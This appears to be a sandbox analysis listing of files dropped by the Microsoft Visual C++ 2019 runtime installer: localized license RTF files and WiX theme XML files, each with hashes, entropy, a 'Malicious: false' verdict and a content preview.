SSDEEP:	192:Qkb65jNkzrUJVbpEiTskXHH1AZWoJxfnVnkDYUqfQFXBue6hX2JSfR7q05kWZxhY:epCD3y/ybox2yrk2
MD5:	8C49936EC4CF0F64CA2398191C462698
SHA1:	CC069FE8F8BC3B6EE2085A4EACF40DB26C842BAC
SHA-256:	7355367B7C48F1BBACC66DFFE1D4BF016C16156D020D4156F288C2B2207ED1C2
SHA-512:	4381147FF6707C3D31C5AE591F68BC61897811112CB507831EFF5E71DD281009400EDA3300E7D3EFDE3545B89BCB71F2036F776C6FDFC73B6B2B2B8FBC084499
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset128 MS Gothic;}{\f1\fnil\fcharset0 MS Gothic;}{\f2\fnil\fcharset134 SimSun;}{\f3\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9\'83\'7d\'83\'43\'83\'4e\'83\'8d\'83\'5c\'83\'74\'83\'67 \'83\'5c\'83\'74\'83\'67\'83\'45\'83\'46\'83\'41 \'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8d\'80\par..\f1 MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0\f0\'96\'7b\'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8d\'80\'82\'cd\f2\'a1\'a2\f1 Microsoft Corporation (\f0\'82\'dc\'82\'bd\'82\'cd\'82\'a8\'8b\'71\'97\'6c\'82\'cc\'8f\'8a\'8d\'dd\'92\'6e\'82\'c9\'89\'9e\'82\'b6\'82\'c4\'82\'cd\'82\'bb\'82\'cc\'8a\'d6\'98\'41\'89\'ef\'8e\'d0) \'82\'c6\'82\'a8\'8b\'71\'97\'6c\'82\'c6\'82\'cc\'8c\'5f\'96\'f1\'82\'f0\'8d\'5c\'90\'ac\'82\'b5\'82\'dc\'82\'b7\'81\'42\'96\'7b\'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1041\thm.wxl

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3959
Entropy (8bit):	5.955167044943003
Encrypted:	false
SSDEEP:	96:uDiTlDuB1n+RNmvFo6bnpojeTPk0R/vueX5OA17IHdGWz:5uB1+gD1DU4EdGE
MD5:	DC81ED54FD28FC6DB6F139C8DA1BDED6
SHA1:	9C719C32844F78AAE523ADB8EE42A54D019C2B05
SHA-256:	6B9BBF90D75CFA7D943F036C01602945FE2FA786C6173E22ACB7AFE18375C7EA
SHA-512:	FD759C42C7740EE9B42EA910D66B0FA3F813600FD29D074BB592E5E12F5EC09DB6B529680E54F7943821CEFE84CE155A151B89A355D99C25A920BF8F254AA008
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.. <Control Control="InstallButton" X="275" Y="237" Width="110" Height="23"/>.. <Control Control="UninstallButton" X="270" Y="237" Width="120" Height="23"/>.. <Control Control="RepairButton" X="187" Y="237" Width="80" Height="23"/>.. .. <String Id="Caption">[WixBundleName] .......</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">..........</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - ............ ......... .........................

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1042\license.rtf

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	27936
Entropy (8bit):	3.871317037004171
Encrypted:	false
SSDEEP:	384:kKIgbA2uBsarNG/HxPvCL1ewjxsXmEw4C7C7R4jAeqCBO968y7yNRylBSFfQv9yH:d3ar8Xa/XAeqoc0wfBB4qN
MD5:	184D94082717E684EAF081CEC3CBA4B1
SHA1:	960B9DA48F4CDDF29E78BBAE995B52204B26D51B
SHA-256:	A4C25DA9E3FBCED47464152C10538F16EE06D8E06BC62E1CF4808D293AA1AFA2
SHA-512:	E4016C0CA348299B5EF761F456E3B5AD9B99E5E100C07ACAB1369DFEC214E75AA88E9AD2A0952C0CC1B707E2732779E6E3810B3DA6C839F0181DC81E3560CBDA
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset129 Malgun Gothic;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 Microsoft \f1\'bc\'d2\'c7\'c1\'c6\'ae\'bf\'fe\'be\'ee\f0 \f1\'bb\'e7\'bf\'eb\'b1\'c7\f0 \f1\'b0\'e8\'be\'e0\'bc\'ad\f0\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0\f1\'ba\'bb\f0 \f1\'bb\'e7\'bf\'eb\'b1\'c7\f0 \f1\'b0\'e8\'be\'e0\'c0\'ba\f0 Microsoft Corporation(\f1\'b6\'c7\'b4\'c2\f0 \f1\'b0\'c5\'c1\'d6\f0 \f1\'c1\'f6\'bf\'aa\'bf\'a1\f0 \f1\'b5\'fb\'b6\'f3\f0 \f1\'b0\'e8\'bf\'ad\'bb\'e7\f0 \f1\'c1\'df\f0 \f1\'c7\'cf\'b3\'aa\f0 )\f1\'b0\'fa\f0 \f1\'b1\'cd\'c7\'cf\f0 \f1\'b0\'a3\'bf\'a1\f0 \f1\'c3\'bc\'b0\'e1\'b5\'c7\'b4\'c2\f0 \f1\'b0\'e8\'be\'e0\'c0\'d4\'b4\'cf\'b4\'d9\f0 . \f1\'ba\'bb\f0 \f1\'c1\'b6\'b0\'c7\'c0\'ba\f0 \f1\'c0\'a7\'bf\'a1\f0 \f1\'b8\'ed\'bd\'c3\'b5\'c8\f0 \f1

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1042\thm.wxl

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3249
Entropy (8bit):	5.985100495461761
Encrypted:	false
SSDEEP:	48:c5DiTlO4TesKOwhDNJCkt1NhEN3m/NFNkbKNdExpVgUnqx6IPaRc0KoUK9TKz0KR:uDiTlUJJCsgqf6YVoz4uU5vI54U5TY
MD5:	B3399648C2F30930487F20B50378CEC1
SHA1:	CA7BDAB3BFEF89F6FA3C4AAF39A165D14069FC3D
SHA-256:	AD7608B87A7135F408ABF54A897A0F0920080F76013314B00D301D6264AE90B2
SHA-512:	C5B0ECF11F6DADF2E68BC3AA29CC8B24C0158DAE61FE488042D1105341773166C9EBABE43B2AF691AD4D4B458BF4A4BF9689C5722C536439CA3CDC84C0825965
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] .. ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">........?</String>.. <String Id="HelpHeader">.. ...</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - ..... ... .. .. .... .., .., .. .... ...... ... .........../passive \| /quiet - .... .. .. UI. ..... UI ... ..... .... ..... ..... UI. .. ..... ........../norestart - .. .... .. .... ...

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1045\license.rtf

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	13265
Entropy (8bit):	5.358483628484379
Encrypted:	false
SSDEEP:	192:TKpWRd0NE41Y/od7V/sHFos7YLQY9DbLM5D+Vw1VAOb0P4/sHLS7VHwHMPw95a+Q:uy0CG9KZ7qQCw1VAOZ/sHOJfcY2wf6p2
MD5:	5B9DF97FC98938BF2936437430E31ECA
SHA1:	AB1DA8FECDF85CF487709774033F5B4B79DFF8DE
SHA-256:	8CB5EB330AA07ACCD6D1C8961F715F66A4F3D69FB291765F8D9F1850105AF617
SHA-512:	4EF61A484DF85C487BE326AB4F95870813B9D0644DF788CE22D3BEB6E062CDF80732CB0B77FCDA5D4C951A0D67AECF8F5DCD94EA6FA028CFCA11D85AA97714E3
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset0 Garamond;}{\f3\fnil Tahoma;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 POSTANOWIENIA LICENCYJNE DOTYCZ\f1\'a5CE OPROGRAMOWANIA\par..\f0 MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Niniejsze postanowienia licencyjne stanowi\f1\'b9 umow\'ea mi\'eadzy Microsoft Corporation (lub, w\~zale\'bfno\'9cci od miejsca zamieszkania Licencjobiorcy, jednym z\~podmiot\f0\'f3w stowarzyszonych Microsoft Corporation) a\~Licencjobiorc\f1\'b9. Maj\'b9 one zastosowanie do wskazanego powy\'bfej oprogramowania. Niniejsze postanowienia maj\'b9 r\f0\'f3wnie\f1\'bf zastosowanie do wszelkich us\'b3ug i aktualizacji Microsoft dla niniejszego oprogramowania, z wyj\'b9tkiem tych, kt\f0\'f3rym towarzysz\f1\'b9 inne postanowienia.\par..\b\

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1045\thm.wxl

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3212
Entropy (8bit):	5.268378763359481
Encrypted:	false
SSDEEP:	48:c5DiTlOPesar4hDo7zGriQjDCN3mDNN0NrsNGl3vxkIP2hUdKLK0KbK4n6W0sfNM:uDiTlusPGriQw8n2rOij4JsU
MD5:	15172EAF5C2C2E2B008DE04A250A62A1
SHA1:	ED60F870C473EE87DF39D1584880D964796E6888
SHA-256:	440B309FCDF61FFC03B269FE3815C60CB52C6AE3FC6ACAD14EAC04D057B6D6EA
SHA-512:	48AA89CF4A0B64FF4DCB82E372A01DFF423C12111D35A4D27B6D8DD793FFDE130E0037AB5E4477818A0939F61F7DB25295E4271B8B03F209D8F498169B1F9BAE
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instalator [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Czy na pewno chcesz anulowa.?</String>.. <String Id="HelpHeader">Instalator . Pomoc</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [katalog] - Instaluje, naprawia, odinstalowuje.. lub tworzy pe.n. lokaln. kopi. pakietu w katalogu. Domy.lnie jest u.ywany prze..cznik install...../passive \| /quiet - Wy.wietla ograniczony interfejs u.ytkownika bez monit.w albo nie wy.wietla ani interfejsu u.ytkownika,.. ani monit.w. Domy.lnie jest wy.wietlany interfejs u.ytkownika oraz wszystkie monity...../norestart - Pom

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1046\license.rtf

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	10656
Entropy (8bit):	5.092962528947159
Encrypted:	false
SSDEEP:	192:WIPAufWXXF0+YkR6E0/CiTS0CsGlHIMqf29H7KxLY/aYzApT3anawLXCBX2:VPAufb+YSSCYrCb5BmW4UDaTqzLwX2
MD5:	360FC4A7FFCDB915A7CF440221AFAD36
SHA1:	009F36BBDAD5B9972E8069E53855FC656EA05800
SHA-256:	9BF79B54F4D62BE501FF53EEDEB18683052A4AE38FF411750A764B3A59077F52
SHA-512:	9550A99641F194BB504A76DE011D07C1183EE1D83371EE49782FC3D05BF779415630450174DD0C03CB182A5575F6515012337B899E2D084203717D9F110A6FFE
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 TERMOS DE LICEN\'c7A PARA SOFTWARE MICROSOFT\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Estes termos de licen\'e7a formam um contrato firmado entre a Microsoft Corporation (ou com base no seu pa\'eds de resid\'eancia, uma de suas afiliadas) e voc\'ea. Eles se aplicam ao software indicado acima. Os termos tamb\'e9m se aplicam a quaisquer servi\'e7os ou atualiza\'e7\'f5es da Microsoft para o software, exceto at\'e9 a extens\'e3o de que eles tenham termos diferentes.\par..\b SE VOC\'ca CONCORDAR COM ESTES TERMOS DE LICEN\'c7A, TER\'c1 OS DIREITOS INDICADOS ABAIXO.\par....\pard{\pntext\f2\'B7\tab}{\\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\sl240\slmult1\t

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1046\thm.wxl

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3095
Entropy (8bit):	5.150868216959352
Encrypted:	false
SSDEEP:	48:c5DiTlO5es/4ThDzmU6lDj4N3mBl0N+NWNP4hHCc9skPDXeKKeK9KfKt4eJ2RQdg:uDiTlJhJGl2UsZMLe6
MD5:	BE27B98E086D2B8068B16DBF43E18D50
SHA1:	6FAF34A36C8D9DE55650D0466563852552927603
SHA-256:	F52B54A0E0D0E8F12CBA9823D88E9FD6822B669074DD1DC69DAD6553F7CB8913
SHA-512:	3B7C773EF72D40A8B123FDB8FC11C4F354A3B152CF6D247F02E494B0770C28483392C76F3C222E3719CF500FE98F535014192ACDDD2ED9EF971718EA3EC0A73E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] Instala..o</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Tem certeza de que deseja cancelar?</String>.. <String Id="HelpHeader">Ajuda da Instala..o</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [diret.rio - instala, repara, desinstala ou.. cria uma c.pia local completa do pacote no diret.rio. Install . o padr.o..../passive \| /quiet - exibe a IU m.nima sem nenhum prompt ou n.o exibe nenhuma IU e.. nenhum prompt. Por padr.o, a IU e todos os prompts s.o exibidos...../norestart - suprime qualquer tentativa de reiniciar. Por padr.o, a IU perguntar. antes de reiniciar

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1049\license.rtf

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	31915
Entropy (8bit):	3.6440775919653996
Encrypted:	false
SSDEEP:	384:ntaMxngQEqQUaAEJxkSjjujcme51oVwuZOFsrnkGxunWxGc9wtvVYgCzkSxN1S2:npgnmWWNEvVYgCzxD
MD5:	A59C893E2C2B4063AE821E42519F9812
SHA1:	C00D0B11F6B25246357053F6620E57D990EFC698
SHA-256:	0EC8368E87B3DFC92141885A2930BDD99371526E09FC52B84B764C91C5FC47B8
SHA-512:	B9AD8223DDA2208EC2068DBB85742A03BE0291942E60D4498E3DAB4DDF559AA6DCF9879952F5819223CFC5F4CB71D4E06E4103E129727AACFB8EFE48403A04FA
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset204 Tahoma;}{\f1\fnil\fcharset0 Tahoma;}{\f2\fnil\fcharset204 Garamond;}{\f3\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang1049\'d3\'d1\'cb\'ce\'c2\'c8\'df \'cb\'c8\'d6\'c5\'cd\'c7\'c8\'c8 \'cd\'c0 \'cf\'d0\'ce\'c3\'d0\'c0\'cc\'cc\'cd\'ce\'c5 \'ce\'c1\'c5\'d1\'cf\'c5\'d7\'c5\'cd\'c8\'c5 MICROSOFT\par..\f1\lang9 MICROSOFT VISUAL C++ 2019 RUNTIME\par..\b0\f0\lang1049\'cd\'e0\'f1\'f2\'ee\'ff\'f9\'e8\'e5 \'f3\'f1\'eb\'ee\'e2\'e8\'ff \'eb\'e8\'f6\'e5\'ed\'e7\'e8\'e8 \'ff\'e2\'eb\'ff\'fe\'f2\'f1\'ff \'f1\'ee\'e3\'eb\'e0\'f8\'e5\'ed\'e8\'e5\'ec \'ec\'e5\'e6\'e4\'f3 \'ea\'ee\'f0\'ef\'ee\'f0\'e0\'f6\'e8\'e5\'e9 Microsoft (\'e8\'eb\'e8, \'e2 \'e7\'e0\'e2\'e8\'f1\'e8\'ec\'ee\'f1\'f2\'e8 \'ee\'f2 \'ec\'e5\'f1\'f2\'e0 \'e2\'e0\'f8\'e5\'e3\'ee \'ef\'f0\'ee\'e6\'e8\'e2\'e0\'ed\'e8\'ff, \'ee\

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1049\thm.wxl

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	4150
Entropy (8bit):	5.444436038992627
Encrypted:	false
SSDEEP:	48:c5DiTlDhQt9esbrohDTWJt49kAr7DHN3m5GNDCNvNLIkflhrWncPingGdZwK1Kqp:uDiTlDYVgmt4xJ88k193ipzjvL
MD5:	17C652452E5EE930A7F1E5E312C17324
SHA1:	59F3308B87143D8EA0EA319A1F1A1F5DA5759DD3
SHA-256:	7333BC8E52548821D82B53DBD7D7C4AA1703C85155480CB83CEFD78380C95661
SHA-512:	53FD207B96D6BCF0A442E2D90B92E26CBB3ECC6ED71B753A416730E8067E831E9EB32981A9E9368C4CCA16AFBCB2051483FDCFC474EA8F0D652FCA934634FBE8
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.. <Control Control="InstallButton" X="275" Y="237" Width="110" Height="23"/>.... <String Id="Caption">......... ......... [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">........?</String>.. <String Id="HelpHeader">....... .. .........</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [.......] - ........., .............., ........ ..... ........ ...... ......... ..... ...... . ......... .. ......... - ............../passive \| /quiet - ........... ....

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1055\license.rtf

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	13379
Entropy (8bit):	5.214715951393874
Encrypted:	false
SSDEEP:	192:1fGkc01jIjZTUDUTvXt2QpfC5VAlCPpDwuOfH7df3YwnnbZIWG2XjQeoO9uBO8CA:Iiqx4Uh2QpMVA8haDdv9nbZzG6oQR2
MD5:	BD2DC15DFEE66076BBA6D15A527089E7
SHA1:	8768518F2318F1B8A3F8908A056213042A377CC4
SHA-256:	62A07232017702A32F4B6E43E9C6F063B67098A1483EEDDB31D7C73EAF80A6AF
SHA-512:	9C9467A2F2D0886FF4302A44AEA89734FCEFBD3CBE04D895BCEACBA1586AB746E62391800E07B6228E054014BE51F14FF63BA71237268F94019063C8C8B7EF74
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT YAZILIMI L\f1\u304?SANS KO\'aaULLARI\par..\f0 MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Bu lisans ko\f1\'baullar\u305?, Microsoft Corporation (veya ya\'baad\u305?\u287?\u305?n\u305?z yere g\f0\'f6re bir ba\f1\u287?l\u305? \'bairketi) ile sizin aran\u305?zda yap\u305?lan anla\'bamay\u305? olu\'baturur. Bu ko\'baullar, yukar\u305?da ad\u305? ge\f0\'e7en yaz\f1\u305?l\u305?m i\f0\'e7in ge\'e7erlidir. \f1\'aaartlar, yaz\u305?l\u305?m i\f0\'e7in t\'fcm Microsoft hizmetleri veya g\'fcncelle\f1\'batirmeleri i\f0\'e7in, beraberlerinde farkl\f1\u305? \'baartlar bulunmad\u305?\u287?\u305? s\f0\'fcrece ge\'e7erlidir.\par..\b BU L\f1\u304?SANS \'aaARTLARINA UYDU\u286?UNUZ TAKD\u304?RDE A\'aaA\u286?IDAK\u3

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1055\thm.wxl

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3221
Entropy (8bit):	5.280530692056262
Encrypted:	false
SSDEEP:	48:c5DiTlOaesHEqhDTHV4zVy6oBzdp0DYK2GP2ZmN3majyNXNoNKQXVvChcPc+WKb0:uDiTl3PHcIflKNTPgdi12xgg
MD5:	DEFBEA001DC4EB66553630AC7CE47CCA
SHA1:	90CED64EC7C861F03484B5D5616FDBCDA8F64788
SHA-256:	E5ABE3CB3BF84207DAC4E6F5BBA1E693341D01AEA076DD2D91EAA21C6A6CB925
SHA-512:	B3B7A22D0CDADA21A977F1DCEAF2D73212A4CDDBD298532B1AC97575F36113D45E8D71C60A6D8F8CC2E9DBF18EE1000167CFBF0B2E7ED6F05462D77E0BCA0E90
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] Kurulumu</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.ptal etmek istedi.inizden emin misiniz?</String>.. <String Id="HelpHeader">Kurulum Yard.m.</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [dizin] - y.kler, onar.r, kald.r.r ya da.. dizindeki paketin tam bir yerel kopyas.n. olu.turur. Varsay.lan install de.eridir...../passive \| /quiet - en az d.zeyde istemsiz UI g.sterir ya da hi. UI g.stermez ve.. istem yoktur. Varsay.lan olarak UI ve t.m istemler g.r.nt.lenir...../norestart - yeniden ba.lama denemelerini engeller. Varsay.lan olarak UI yeniden ba.l

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\2052\license.rtf

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	17863
Entropy (8bit):	3.9617786349452775
Encrypted:	false
SSDEEP:	192:BxoqPyOj+/8Tk5VigWgijAlk5xWvSCI5lgios0EhGXxGMLVGW+uUoqyLZDvAJxMx:vbIeaE7q3KGgzD2
MD5:	3CF16377C0D1B2E16FFD6E32BF139AC5
SHA1:	D1A8C3730231D51C7BB85A7A15B948794E99BDCE
SHA-256:	E95CA64C326A0EF7EF3CED6CDAB072509096356C15D1761646E3C7FDA744D0E0
SHA-512:	E9862FD0E8EC2B2C2180183D06535A16A527756F6907E6A1D2DB85092636F72C497508E793EE8F2CC8E0D1A5E090C6CCF465F78BC1FA8E68DAF7C68815A0EE16
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset134 SimSun;}{\f1\fnil\fcharset0 Tahoma;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9\'ce\'a2\'c8\'ed\'c8\'ed\'bc\'fe\'d0\'ed\'bf\'c9\'cc\'f5\'bf\'ee\f1\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0\f0\'d5\'e2\'d0\'a9\'d0\'ed\'bf\'c9\'cc\'f5\'bf\'ee\'ca\'c7\f1 Microsoft Corporation\f0\'a3\'a8\'bb\'f2\'c4\'fa\'cb\'f9\'d4\'da\'b5\'d8\'b5\'c4\f1 Microsoft \f0\'b9\'d8\'c1\'aa\'b9\'ab\'cb\'be\'a3\'a9\'d3\'eb\'c4\'fa\'d6\'ae\'bc\'e4\'b4\'ef\'b3\'c9\'b5\'c4\'d0\'ad\'d2\'e9\'a1\'a3\'d5\'e2\'d0\'a9\'cc\'f5\'bf\'ee\'ca\'ca\'d3\'c3\'d3\'da\'c9\'cf\'ca\'f6\'c8\'ed\'bc\'fe\'a1\'a3\'d5\'e2\'d0\'a9\'cc\'f5\'bf\'ee\'d2\'b2\'ca\'ca\'d3\'c3\'d3\'da\'d5\'eb\'b6\'d4\'b8\'c3\'c8\'ed\'bc\'fe\'b5\'c4\'c8\'ce\'ba\'ce\'ce\'a2\'c8\'ed\'b7\'fe\'ce\'f1\'bb\'f2\'b8\'fc\'d0\'c2\'a3\'ac\'b5\'ab\'d3\'d0\'b2\'bb\'cd\

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\2052\thm.wxl

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2978
Entropy (8bit):	6.135205733555905
Encrypted:	false
SSDEEP:	48:c5DiTlOtKesi+hDtkQf7lz+W0gopN3m5+3cNONeN1ra8vWqPtlTKxKUTKlKXRoR+:uDiTlV5kQR9GLeE0ZxV6gIV
MD5:	3D1E15DEEACE801322E222969A574F17
SHA1:	58074C83775E1A884FED6679ACF9AC78ABB8A169
SHA-256:	2AC8B7C19A5189662DE36A0581C90DBAD96DF259EC00A28F609B644C3F39F9CA
SHA-512:	10797919845C57C5831234E866D730EBD13255E5BF8BA8087D53F1D0FC5D72DC6D5F6945DBEBEE69ACC6A2E20378750C4B78083AE0390632743C184532358E10
Malicious:	false
